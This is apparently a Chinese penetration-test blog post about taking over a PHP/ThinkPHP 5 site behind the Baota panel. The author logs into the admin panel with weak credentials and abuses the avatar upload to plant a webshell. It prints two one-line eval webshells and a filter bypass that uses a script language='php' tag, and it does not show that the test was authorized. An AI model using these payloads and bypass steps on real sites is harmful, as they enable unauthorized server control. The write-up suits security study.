记一次有趣的一句话拿Shell的渗透测试过程

记一次有趣的一句话拿Shell的渗透测试过程

前言

拿到的是一个代理网站，简单先观察了下网站，发现使用的是PHP+ 宝塔 +Tp5框架的网站。通过弱口令进入后台任意文件上传拿shell。也不知道说啥，直接记录步骤吧

步骤

1.首先拿到这个网站，先简单的信息收集，了解到网站的基本信息：

(1).该网站使用php

(2)使用的服务器是linux.用的是宝塔

(3)中间件Apache

(4)框架是Tp5

2.先是找到了网站的登陆地方：

运气爆棚的用弱口令登陆了进去：

用户名：123456

密码：123456

3.进入后台有一个头像上传点：

先上传一个jpg图片然后BurpSuite抓包：

数据包中直接修改后缀为php - Go -上传成功！

获取到的上传地址为：

http://xxxxx.com/uploads/face/20190827/1fac611f65a7dc6dde4ae2f9643c6463.php

发现是可以解析php文件！那么数据包中修改上传一句话试试：

一句话是这样：

<?php @eval($_POST['liuwx']);?>

返回包显示：非法上传！

说明不行！经过我测试他拦截规则是验证了数据包中是否有：

<?php

反复Fuzz发现用空格就可以绕过：

<? php

但是访问一句话地址的时候就会出错：

后来问团队的Ae大佬告诉我可以用这种方法绕过：

结果我去试了一试确实是可以这样绕过的：

不愧是Ae大佬，一分钟就让我拿到Shell了！在这说一句Ae大佬666！

Webshell

最终也是用这个一句话拿到了Webshell：

<script language="php">
@eval($_POST['a']);
</script>

总结

这次成功Getshell主要利用弱口令、文件上传等等拿到了Shell。其中本来想用TP5的Poc去执行一波命令，但是失败了，不过最终也是成功得到了网站的控制权限。